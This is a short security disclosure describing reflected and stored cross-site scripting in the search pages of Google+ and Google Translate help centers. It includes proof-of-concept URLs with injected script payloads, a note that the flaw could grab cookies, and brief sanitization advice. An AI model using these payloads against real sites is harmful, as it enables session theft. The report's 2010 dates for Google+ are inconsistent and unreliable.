Menu0x1 Affected Script: Google+ Help Support & Google+ Help Support & Google Translator Help Support
0x2 Script Link: http://translate.google.com/ & http://plus.google.com/
0x4 Author: Sandeep kamble
0x5 Reported : June 30 2010
0x6 Public Release July 21 2010
------------------------------------------------------------------
Affected Script Overview : Google+ Help Center where you can find tips and tutorials on using Google+ and other answers to frequently asked questions and Google Translate Help Center where you can find tips and tutorials on using Google Translate and other answers to frequently asked questions.
Affected script :
1) +/bin/search.py?query=
2) support/bin/search.py?query= (Subdomain Translator)
Exploit : Executing Javascript using the vulnerable variable called as ?Query . This attack is commonly know as Cross Site Scripting (XSS)
Google + affected script having stored Xss attack which can used for the grabbing the cookies .
Google Translator Non-persistent XSS attack which can be used to execute only the JS Script
POC :
1) Google +
Code:
http://www.google.com/support/+/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27ss%27%29%3C/script%3E&btnG=Search
Don't shock , you might be thinking the payload "alert('ss')" and give output as "XSS" in message . This is happen due to spelling (google function did u meant it) ..
Try to search this keyword
Code:
<script>alert('ss')</script>
2) Translator Google
Code:
http://translate.google.com/support/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27s%27%29%3C%2Fscript%3E&btnG=Search+Help&ctx=en%3Asearchbox
Countermeasure
1) Determine whether HTML output includes input parameters
2) In short perform input sanitization
Special Thanks : Rahul fbone , Bond, 41.w4r10r, Subhash, ShriNivas , Vishal , Yogesh, Darshit
Finally you can See my name at
Code:
http://www.google.com/about/corporate/company/halloffame.html
Sandeep k
G4H Facebook
Rate this article